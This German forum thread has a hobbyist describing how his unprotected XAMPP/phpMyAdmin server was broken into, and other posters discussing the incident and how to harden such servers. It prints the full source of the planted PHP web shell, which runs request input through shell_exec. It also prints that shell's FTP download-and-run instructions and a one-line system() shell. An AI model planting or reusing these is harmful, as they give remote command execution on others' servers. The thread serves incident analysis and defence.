Person hinter er ip rausfinden(mein serv hacked)

[HUnttuCH]

Also ich hab nen server hier auf meinem pc laufen (xampp neue version). Vorhin am nachmittag plötlich die meldung von meinem Virenscanner:
16.04.2006 17:06:59 AMON Datei C:\Programme\xampp\phpMyAdmin\clearlogs.exe Win32/HackTool.Clearlog.A Trojaner Unter Quarantäne gestellt. - gelöscht Versuch Datei zu erstellen durch: C:\WINDOWS\system32\ftp.exe. Die Datei wurde in die Quarantäne verschoben. Sie können dieses Fenster schließen.

Mhh ne Datei namens clearlogs.exe im verzeichnis meines servers aber dank NOD32(ich liebe es) rechtzeitig endeckt. Also erstma die serverlogs angeschaut und die ip vom überltäter rauskopiert.Die letzten paar zeilen des logs:

84.178.63.222 - - [16/Apr/2006:16:55:05 +0200] "GET /phpmyadmin/main.php HTTP/1.1" 200 56902
84.178.63.222 - - [16/Apr/2006:16:55:06 +0200] "GET /phpmyadmin/favicon.ico HTTP/1.1" 200 18902
84.178.63.222 - - [16/Apr/2006:16:55:07 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:55:13 +0200] "GET /phpmyadmin/css/print.css?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 185
84.178.63.222 - - [16/Apr/2006:16:55:13 +0200] "GET /phpmyadmin/libraries/tooltip.js HTTP/1.1" 200 5171
84.178.63.222 - - [16/Apr/2006:16:55:13 +0200] "GET /phpmyadmin/themes/xampp/img/b_help.png HTTP/1.1" 200 229
84.178.63.222 - - [16/Apr/2006:16:55:13 +0200] "GET /phpmyadmin/themes/xampp/img/logo_right.png HTTP/1.1" 200 5644
84.178.63.222 - - [16/Apr/2006:16:55:13 +0200] "GET /phpmyadmin/themes/xampp/img/b_newdb.png HTTP/1.1" 200 408
84.178.63.222 - - [16/Apr/2006:16:55:14 +0200] "GET /phpmyadmin/themes/xampp/img/s_asci.png HTTP/1.1" 200 254
84.178.63.222 - - [16/Apr/2006:16:55:14 +0200] "GET /phpmyadmin/themes/xampp/img/s_vars.png HTTP/1.1" 200 306
84.178.63.222 - - [16/Apr/2006:16:55:14 +0200] "GET /phpmyadmin/themes/xampp/img/s_process.png HTTP/1.1" 200 362
84.178.63.222 - - [16/Apr/2006:16:55:15 +0200] "GET /phpmyadmin/themes/xampp/img/s_reload.png HTTP/1.1" 200 245
84.178.63.222 - - [16/Apr/2006:16:55:14 +0200] "GET /phpmyadmin/themes/xampp/img/s_status.png HTTP/1.1" 200 313
84.178.63.222 - - [16/Apr/2006:16:55:14 +0200] "GET /phpmyadmin/themes/xampp/img/b_engine.png HTTP/1.1" 200 362
84.178.63.222 - - [16/Apr/2006:16:55:15 +0200] "GET /phpmyadmin/themes/xampp/img/s_rights.png HTTP/1.1" 200 512
84.178.63.222 - - [16/Apr/2006:16:55:15 +0200] "GET /phpmyadmin/themes/xampp/img/s_db.png HTTP/1.1" 200 285
84.178.63.222 - - [16/Apr/2006:16:55:16 +0200] "GET /phpmyadmin/themes/xampp/img/b_info.png HTTP/1.1" 200 234
84.178.63.222 - - [16/Apr/2006:16:55:15 +0200] "GET /phpmyadmin/themes/xampp/img/b_export.png HTTP/1.1" 200 313
84.178.63.222 - - [16/Apr/2006:16:55:15 +0200] "GET /phpmyadmin/themes/xampp/img/b_import.png HTTP/1.1" 200 310
84.178.63.222 - - [16/Apr/2006:16:55:16 +0200] "GET /phpmyadmin/themes/xampp/img/s_lang.png HTTP/1.1" 200 422
84.178.63.222 - - [16/Apr/2006:16:55:16 +0200] "GET /phpmyadmin/themes/xampp/img/s_theme.png HTTP/1.1" 200 737
84.178.63.222 - - [16/Apr/2006:16:55:16 +0200] "GET /phpmyadmin/themes/xampp/img/b_docs.png HTTP/1.1" 200 292
84.178.63.222 - - [16/Apr/2006:16:55:16 +0200] "GET /phpmyadmin/themes/xampp/img/b_home.png HTTP/1.1" 200 370
84.178.63.222 - - [16/Apr/2006:16:55:34 +0200] "POST /phpmyadmin/db_create.php HTTP/1.1" 200 2359
84.178.63.222 - - [16/Apr/2006:16:55:35 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:55:37 +0200] "GET /phpmyadmin/libraries/functions.js HTTP/1.1" 200 40487
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/s_host.png HTTP/1.1" 200 316
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/item_ltr.png HTTP/1.1" 200 173
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_search.png HTTP/1.1" 200 605
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_props.png HTTP/1.1" 200 294
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_sql.png HTTP/1.1" 200 322
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/css/themes/original/img/error.ico HTTP/1.1" 404 1247
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_tblops.png HTTP/1.1" 200 345
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_deltbl.png HTTP/1.1" 200 364
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/original/img/error.ico HTTP/1.1" 200 318
84.178.63.222 - - [16/Apr/2006:16:55:40 +0200] "GET /phpmyadmin/themes/xampp/img/b_newtbl.png HTTP/1.1" 200 409
84.178.63.222 - - [16/Apr/2006:16:55:52 +0200] "POST /phpmyadmin/tbl_create.php HTTP/1.1" 200 8363
84.178.63.222 - - [16/Apr/2006:16:55:53 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/themes/xampp/img/s_tbl.png HTTP/1.1" 200 252
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/libraries/keyhandler.js HTTP/1.1" 200 1686
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/themes/xampp/img/b_index.png HTTP/1.1" 200 315
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/themes/xampp/img/b_primary.png HTTP/1.1" 200 416
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/themes/xampp/img/b_unique.png HTTP/1.1" 200 281
84.178.63.222 - - [16/Apr/2006:16:55:55 +0200] "GET /phpmyadmin/themes/xampp/img/b_ftext.png HTTP/1.1" 200 277
84.178.63.222 - - [16/Apr/2006:16:56:05 +0200] "POST /phpmyadmin/tbl_create.php HTTP/1.1" 200 4299
84.178.63.222 - - [16/Apr/2006:16:56:06 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/css/themes/original/img/error.ico HTTP/1.1" 404 1247
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_browse.png HTTP/1.1" 200 265
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_tblimport.png HTTP/1.1" 200 280
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_insrow.png HTTP/1.1" 200 283
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_tblexport.png HTTP/1.1" 200 283
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_empty.png HTTP/1.1" 200 298
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_edit.png HTTP/1.1" 200 451
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_drop.png HTTP/1.1" 200 311
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/bd_primary.png HTTP/1.1" 200 389
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/bd_index.png HTTP/1.1" 200 315
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/bd_unique.png HTTP/1.1" 200 287
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/bd_ftext.png HTTP/1.1" 200 277
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/arrow_ltr.png HTTP/1.1" 200 277
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_print.png HTTP/1.1" 200 574
84.178.63.222 - - [16/Apr/2006:16:56:08 +0200] "GET /phpmyadmin/themes/xampp/img/b_relations.png HTTP/1.1" 200 280
84.178.63.222 - - [16/Apr/2006:16:56:09 +0200] "GET /phpmyadmin/themes/xampp/img/b_tblanalyse.png HTTP/1.1" 200 296
84.178.63.222 - - [16/Apr/2006:16:56:09 +0200] "GET /phpmyadmin/themes/xampp/img/s_warn.png HTTP/1.1" 200 261
84.178.63.222 - - [16/Apr/2006:16:56:47 +0200] "GET /phpmyadmin/tbl_change.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=Darkhammer&table=Darkhammer&goto=tbl_properties_structure.php&back=tbl_properties_structure.php HTTP/1.1" 200 2922
84.178.63.222 - - [16/Apr/2006:16:56:48 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:56:49 +0200] "GET /phpmyadmin/libraries/tbl_change.js HTTP/1.1" 200 10983
84.178.63.222 - - [16/Apr/2006:16:56:50 +0200] "GET /phpmyadmin/css/themes/original/img/error.ico HTTP/1.1" 404 1247
84.178.63.222 - - [16/Apr/2006:16:56:50 +0200] "GET /phpmyadmin/themes/xampp/img/b_tipp.png HTTP/1.1" 200 308
84.178.63.222 - - [16/Apr/2006:16:57:19 +0200] "POST /phpmyadmin/tbl_replace.php HTTP/1.1" 200 7431
84.178.63.222 - - [16/Apr/2006:16:57:21 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:57:27 +0200] "GET /phpmyadmin/tbl_properties.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=Darkhammer&table=Darkhammer&goto=tbl_properties_structure.php&back=tbl_properties_structure.php HTTP/1.1" 200 2661
84.178.63.222 - - [16/Apr/2006:16:57:28 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:57:48 +0200] "POST /phpmyadmin/import.php HTTP/1.1" 200 3130
84.178.63.222 - - [16/Apr/2006:16:57:49 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right HTTP/1.1" 200 22241
84.178.63.222 - - [16/Apr/2006:16:57:59 +0200] "GET /phpmyadmin/cmdscript.php HTTP/1.1" 200 4167
84.178.63.222 - - [16/Apr/2006:16:57:59 +0200] "GET /favicon.ico HTTP/1.1" 200 21630
84.178.63.222 - - [16/Apr/2006:16:58:01 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 9533
84.178.63.222 - - [16/Apr/2006:16:59:20 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4203
84.178.63.222 - - [16/Apr/2006:16:59:26 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4199
84.178.63.222 - - [16/Apr/2006:16:59:29 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4198
84.178.63.222 - - [16/Apr/2006:16:59:35 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4191
84.178.63.222 - - [16/Apr/2006:16:59:39 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4199
84.178.63.222 - - [16/Apr/2006:16:59:43 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4204
84.178.63.222 - - [16/Apr/2006:16:59:47 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4202
84.178.63.222 - - [16/Apr/2006:16:59:51 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4197
84.178.63.222 - - [16/Apr/2006:16:59:55 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4198
84.178.63.222 - - [16/Apr/2006:16:59:59 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4201
84.178.63.222 - - [16/Apr/2006:17:00:02 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4195
84.178.63.222 - - [16/Apr/2006:17:00:06 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4189
84.178.63.222 - - [16/Apr/2006:17:00:11 +0200] "GET /phpmyadmin/cmdscript.php HTTP/1.1" 200 4167
84.178.63.222 - - [16/Apr/2006:17:00:14 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 9628
84.178.63.222 - - [16/Apr/2006:17:01:19 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 9628
84.178.63.222 - - [16/Apr/2006:17:01:27 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 9730
84.178.63.222 - - [16/Apr/2006:17:00:10 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 715
84.178.63.222 - - [16/Apr/2006:17:01:59 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 7281
84.178.63.222 - - [16/Apr/2006:17:02:09 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4182
84.178.63.222 - - [16/Apr/2006:17:02:18 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4180
84.178.63.222 - - [16/Apr/2006:17:02:21 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4187
84.178.63.222 - - [16/Apr/2006:17:02:28 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4187
84.178.63.222 - - [16/Apr/2006:17:02:33 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4232
84.178.63.222 - - [16/Apr/2006:17:03:54 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4304
84.178.63.222 - - [16/Apr/2006:17:04:05 +0200] "POST /phpmyadmin/cmdscript.php HTTP/1.1" 200 4175

Jetzt wuerd ich gern wissen, ob man da was machen kann um rauszufinden wer das war. Ich find das lame irgendwelche scanner laufen zu lassen, um dann "hackable" server zu finden, um da irgendeinen scheiss zu machen. Was muss man machen, damit die telekom die daten angibt, die hinter der ip stehen?

 

[CrispiN]

das kannst du vergessen...die Telekom gibt nix raus ausser die Polizei fordert derartige Daten mit richterlicher Anordnung

 

[King Bill]

tja ich würde vermute das er über nen gateway gegangen ist

ansonsten wäre es ein schlechter hacker

 

[Seratio]

anzeige gegen unbekannt? aber btw wenn er auf phpmyadmin draufkommt. Und ich denk mal du hast kein pw drauf gehabt! dann ist das sowieso eigene dummheit! laut den logs hat er ja auch kein pw eingegeben
nein ich mein da wirst du nicht viel machen können. dein hacker scheint halt eine sicherheitslücke ausgenuzt zu haben. Denn in phpmyadmin gibt es keine cmdscripts.php. Die wird er vermutlich mit dem Create Table usw also alle php dateien die er aufgerufen hat erstellt haben.
die clearlogs.exe gibt es auch nicht ich denk mal auch die wird er irgendwie auf deinen server kopiert haben. Wenn du die cmdscript.php noch hast. könntest du mir mal den inhalt in den thread posten oder mir per pn schicken?
mich interessiert mal wie er das gemacht hat.

MfG
ALex

 

[HUnttuCH]

er wird das hundertpro mit phpadmin gemacht haben. Ich hab den server grad erst installiert und noch nichts configuriert, der hatte freie bahn.

 

[King Bill]

joa das nenn ich dann mal, eigene dummheit, hat er irgendwas gezogen was wichtig sein könnte ?

 

[HUnttuCH]

Hier der code

<? $cmd = $_REQUEST["-cmd"];?>
\
 <html>
\
 <head>
\
 <title>HaCk ThE PlanEt CmD script By TMOD </title>
\
 <style type="text/css">
\
 <!--
\
 .Stil15 {
\
 color: #FF0000;
\
 font-weight: bold;
\
 }
\
 .Stil16 {color: #00FF00}
\
 .Stil17 {color: #FFFF00}
\
 .Stil23 {color: #FF0000; font-weight: bold; }
\
 -->
\
 </style>
\
 </head>
\
 <body bgcolor=#FF0000 text=##00FF00 onLoad="document.forms[0].elements[-cmd].focus()">
\
 <form method=POST>
\
   <br>
\
   <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
\
 style="background:#000033;color:#00FF00;">
\

\
   <pre>
\
 <? if($cmd != "") print Shell_Exec($cmd);?>
\
 </pre>
\
 </form>
\
 <p> </p>
\
 </p>
\
 <table border="1">
\
   <tr>
\
     <td width="467"><span class="Stil16">(((¯`·.¸¸¸.-<strong>cMd.exE:</strong> -.¸¸¸.·´¯)))</span><br>
\
       <br>
\
       </p>
\
       <table width="463" border="1">
\
         <tr>
\
           <td width="60">dir</td>
\
           <td width="387"><span class="Stil16"><strong>Zeigt den Inhalt eines Verzeichnisses auf</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>cd</td>
\
           <td><span class="Stil16"><strong>Wechselt in ein Verzeichnis</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>echo</td>
\
           <td><span class="Stil16"><strong>Zeigt Meldungen an, schaltet Befehlsanzeige an/aus</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>ipconfig</td>
\
           <td><span class="Stil16"><strong> Liefert die Ip, Gateway Adresse</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>mkdir</td>
\
           <td><span class="Stil16"><strong>Erstellt ein Verzeichnis</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td> path</td>
\
           <td><span class="Stil16"><strong> Zeigt den Pfad an, in dem nach Programmen gesucht wird</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td> ping</td>
\
           <td><span class="Stil16"><strong> Sendet ping-Signale an einen Rechner</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>rmdir</td>
\
           <td><span class="Stil16"><strong>Löscht ein Verzeichnis</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>xcopy</td>
\
           <td><span class="Stil16"><strong>Kopiert Dateien und Verzeichnisstrukturen</strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>></td>
\
           <td><span class="Stil16"><strong>Ausgabe wird umgeleitet </strong></span></td>
\
         </tr>
\
         <tr>
\
           <td>>></td>
\
           <td><span class="Stil16"><strong>Ausgabe wird umgeleitet und angehängt</strong></span></td>
\
         </tr>
\
       </table></td>
\
     <td width="391"><img src="http://xs69.xs.to/pics/06080/hackedbyme.gif" width="391" height="336"></td>
\
     <td width="345"><span class="Stil16"><strong>FTP Download auf Server ausführen, ohne [ ] ( ).</strong></span><br>
\
       <span class="Stil16">Alles muss nacheinander eingegeben werden !!!</span><br>
\
       </span>
\
       </p>
\
       <table width="345" border="1">
\
         <tr>
\
           <td width="335">Echo Open [IP-Adresse] [Port]>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">Echo [Benutzername]>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">Echo [Passwort]>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">Echo [Format - für .exe Dateien (Binary)]>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">Echo GET [Datei auf eurem Server]>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">Echo Quit>>TMOD.txt</td>
\
         </tr>
\
         <tr>
\
           <td width="335">FTP.exe -s:TMOD.txt</td>
\
         </tr>
\
       </table>
\
       <p><span class="Stil23">Datei auf Server ausführen:</span></p>
\
       <table width="337" border="1">
\
         <tr>
\
           <td width="290">Dateiname.exe</td>
\
         </tr>
\
       </table></td>
\
   </tr>
\
 </table>
\
 <p class="Stil17"><span class="Stil16">cMd Script by <strong>cRasH0VerDrivE</strong></span></p>
\
 </body>
\
 </html>

hier bei möchte ich auf die zeile mit dem hackedbyme.gif verweisen. Sowas geiles hab ich ja noch nie gesehen DDD. Vor allen dingen "HACKED". Das is doch kein hacken, wenn er nächtelang seine scheiss scanner laufen lässt, um unkonfigurierte server zu finden. Wer hier wohl lame is...




ich komm nicht drüber weg, "hacked by me"
naja jetzt weiss ich ja schonmal, dass der gute man cRasH0VerDrivE heisst

 

[Seratio]

hmm darum möchte ich mal wissen was in der cmdscript.php, damit könnte man sehn was er alles machen konnte. ich denke mal es wird was wie:
<?php
system($_GET['command']);
?>
drinn stehen. das heißt er könnte über http://ip/cmdscripts.php?command=
jedes commando deiner cmd auführen. dh auch ftp, löschen, telnet, shutdown reboot egal was eigentlich alles was so mit cmd möglich ist.
vermutlich hat er nur auf deinem system rumgeschnüffelt und dann die logs gelöscht was ja nicht ganz geklappt hat.

EDIT genau das hab ich vermutet mit dem script xD

MfG
Alex

 

[cuda]

er wird das hundertpro mit phpadmin gemacht haben. Ich hab den server grad erst installiert und noch nichts configuriert, der hatte freie bahn.

Selber schuld. Du lässt Apache laufen, obwohl er noch völlig offen und ungeschützt ist. Super gemacht, grosse Klasse.

'cuda

 

[Seratio]

sry aber neeeeeeeeeeeeeeeeeee LOOOOOL zu geil das script:
hier guckt euch das an:

 

[King Bill]

lol

 

[HUnttuCH]

naja, ich hab meine lektion gelernt.....
Jetzt erstma schön der server deinstallieren und morgen neu aufsetzen UND konfigurieren ... n8

 

[Seratio]

braves bubu
Merke:
Haste kein PW aufm Server, haste ganz schnell viele Würmer!!

 

[irietical]

hahaha looooool wollte sich wohl einer nen pubstro klarmachen :>>>

 

[Sebi20V]

Hallo Zusammen,
erst mal rofl, das script ist ja zu geil: dir -> Zeigt den Inhalt eines Verzeichnisses auf
"Hacken" für 6 Jährige...

Aber jetzt wieder ernsthaft, ich hab auch nen kleinen privaten Webserver auf Win 2003 mit Apache, PHP, MySQL (incl. phpMyAdmin) am laufen, also die gleichen Vorraussetzungen. Und leider bin ich Sicherheitstechnisch auch nicht so fit, mach das nur als Hobby. Passwörter sind aber überall gesetzt (und meine sind immer sehr kreativ, dass ich mich selber dauernd aussperre) und Apache läuft unter einem eigenen Benutzer mit normalen Benutzer Rechten und Schreibzugriff nur wo es nötig ist (logs und manche PHP Skripte). Zum bisschen rumschnüffeln und Skripte hochladen würde es aber reichen!

Wie hat der es geschafft per phpMyAdmin eine Datei (die cmdscript.php) hochzuladen?
Und sehe ich es richtig, dass der php Befehl "shell_exec" alles, was zum Beispiel per Formular übergeben wird, in der Windows Eingabeaufforderung ausführen kann!?

Kannte den Befehl bisher nicht, aber das ist ja wirklich gefährlich, was hat denn ein php Script in der cmd verloren! Kann man den Befehl irgendwie deaktivieren ohne den safe_mode zu aktivieren? Die Beschränkungen vom Benutzerkonto müssten da aber auch gelten, sprich nur Zugriff wo der Apache-Benutzer auch lese bzw. schreib Rechte hat?

Ein eigener Benutzer für Apache wäre bei dir wahrscheinlich auch nicht schlecht HUnttuCH, denke nicht dass XAMPP den automatisch installiert. Wenn du willst poste ich mal wie es gemacht wird (steht zwar auch in der Apache Doku, hat aber ein bisschen gedauert bis ich es hinbekommen hab).

Gruß Sebastian

 

[Madnex]

und meine sind immer sehr kreativ, dass ich mich selber dauernd aussperre

Benutze doch einen Passwort Safe wie beispielsweise Keepass. Dann passiert dir sowas nicht mehr.

 

[Seratio]

in phpmyadmin wird es in dieser version(2.7) einen bug geben der es erlaubt mittels eines tricks eine php datein einzu schmuggeln. nehmen wir mal an du hast das große sql fenster wo du deine querys reinschreiben kannst. Manipulierst du das ganze bzw nutzt einen bug aus. kannst du dort in das formular einen beliebigen code reinschreiben und dieser wird dann ausgeführt. Hier wird sich der hacker über die file commands halt die datei erstellt haben und tadaaa er hat freies händchen. Darum benutz ich linux für sowas dort kann man wenigstens den user www-data "einsperren" man sollte aba auch sonst alles richtig gesetzt haben.

ach und die clearlog.exe hat er mitterl ftp hochgeladen, also auch kein problem.

 

[HUnttuCH]

mhhh das tolle an xampp ist doch, dass es sich automatisch installiert. Das erste mal hab ich alles einzeln installiert also erst apache mysql, ftp server aber bei perl hatte ich keine lust mehr, also xampp runtergeladen

 

[buyman]

xampp sollte man nicht im inet laufen lassen

ich hab den fehler auch mal gemacht, weil ich im stress war. aber nachdems meine erste xampp installation war hab ich fürs absichern wohl genauso lange gebraucht wie wenn ich gleich alles einzeln instlaliert hätte

 

[Sebi20V]

@Madnex
Von Passwort Safes halte ich nicht sonderlich viel. Mag vielleicht ein Vorurteil sein, aber erstens erscheint es mir widersinnig die Passwörter auf dem PC zu speichern den sie schützen sollen (weiß ja nicht wie sicher die Safes sind) und zweitens hilft mir so ein Teil wahrscheinlich auch nichts wenn mir mal wieder mein Windows Passwort nicht einfällt. Hatte ich auch schon mal, deshalb hab ich jetzt immer einen Administrator Nutzer auf reserve dann kann ich das andere PW neu setzten.
Also mit der Passwort Problematik komm ich (auf meine seltsame Weiße) schon irgendwie zurecht

@Nascar
Dass es in phpMyAdmin 2.7 einen Bug gibt ist gut zu wissen. Ist die pl2 auch davon betroffen? Die benutze ich nämlich, muss dann ggf. auf 2.8 updaten.
Linux ist bei mir leider nicht drin. Hab mit Computern wie gesagt nur als Hobby zu tun, und da reicht dann die Zeit nicht aus sich in ein ganz anderes OS einzuarbeiten.

@HUnttuCH
Bei solchen komplett Paketen wie XAMPP bin ich auch eher skeptisch. Apache, PHP und MySQL sind ja eigentlich schell installiert, wie es mit PERL aussieht weiß ich nicht. Benutzt du das überhaupt?
Bei der manuellen Installation hab ich die Hinweise in den jeweiligen Dokumentationen beachtet (eigener Benutzer für Apache, PHP nicht als CGI, usw.) wie sicher das ganze ist frage ich mich aber trotzdem. In der PHP Doku heißt es ja man soll Apache 2.0 und PHP generell nicht in einer Produktivumgebung verwenden. Es stellt sich natürlich die Frage ob es wirklich so drastisch ist, immerhin verwendet ja jeder zweite Webserver diese Kombination, und wie Produktiv unsere Homeserver überhaupt sind

@All
Kennt Jemand eine gute Seite oder ein gutes Buch wo beschrieben wird wie man WAMP richtig sicher installiert? Hier selber schreiben ist natürlich auch erlaubt
In den normalen Installationsanleitungen, in PHP Büchern z.B., steht ja immer nur drin wie man den Server einigermaßen zum laufen bringt, sprich PHP Modul in die httpd.conf eintragen, über eine ordentliche Konfiguration oder Sicherheit verlieren die meistens kein Wort

 

[HUnttuCH]

naja, eigentl brauch ich perl nich. Ich hatte da nur so ein schönes script gefunden, das ich ausprobieren wollte. Aber jetzt benutz ich es eh nicht. Also dann wieder einzeln installieren. OK

 

[Seratio]

Sebi20V also ob der bug in der 2.8er auch vorhanden ist kann ich dir nicht sage. ich hab das nur daraus geschlussfolgert, da HUnttuCH die 2,7er verwendet.

Zur Sicherheit von Webservern: Ein Webserver ist nur so sicher wie deren Passwörter und Scripts.
d.h. Wenn du einen Apache Server mit reinem HTML installierst, kann dir nicht wirklich viel passieren, aber sobald php ins spiel kommt sieht das schon anders aus.
Was du machen kannst:
- Apache User auf sein Webserververzeichnis beschränken und so wenig wie möglich rechte geben.
- PHP Safemod On damit keine Systembefehle ausgeführt werden können
- Server und Scripte immer auf aktuellen Stand halten. Also PHPMyAdmin immer updaten usw
- Sichere Passwörter wählen
- evtl den Webserver auf einen anderen Port legen also das wenn man die iP des rechners im IE eingibt das man nicht sofort aufm webserver landet.
- MySQL und FTP richtig konfigurieren. also admin/root passwort festlegen und zugriffe bei mysql nur auf localhost begrenzen. Bei FTP nur das entsprechende Verzeichnis mit zugriff versehen.

Ich hab damals meinen Test Windows Webserver nach der Anleitung hier installiert:
http://bazzinet.info/WebserverB
ost allerdings auf englisch und hat keinen sicherheits guide. aber falls ihr noch fragen habt immer her damit

MfG
Alex

 

[Madnex]

@Sebi20V
Keepass arbeitet mit dem AES und Towfish Algorithmus. Beide sind quelloffen, gut getestet und gelten als sicher. Ebenso ist Keepass quelloffen und OSI-Zertifiziert.

Die Datenbank musst du ja nicht unbedingt auf der Festplatte speichern sondern kannst sie auch auf einem USB-Stick (z.B.) ablegen. So hast du über anderer Rechner immer Zugriff. Eine oder mehrere aktuelle Sicherungen dieser Datenbankdatei ist allerdings pflicht, was aber auch für alle wichtigen Daten gilt.

Du kannst es natürlich handhaben wie du meinst. Schau dir das Programm aber doch mal an. Über eine Sprachdatei kannst du es sogar Deutsch lehren.

Schau mal hier: klick!

 

[Sebi20V]

Also, hab mich gestern noch ein bisschen informiert:

In der php.ini kann man mit disable_functions beliebige Funktionen deaktivieren, der jeweiligen Namen einfach durch Kommata trennen. Ist mir bis jetzt nie Aufgefallen weil es direkt unter den safe_mode Einstellungen steht und ich den safe_mode off hab (der geht mir etwas zu weit, gibt bei Datei- und Ordneroperationen oft Probleme).

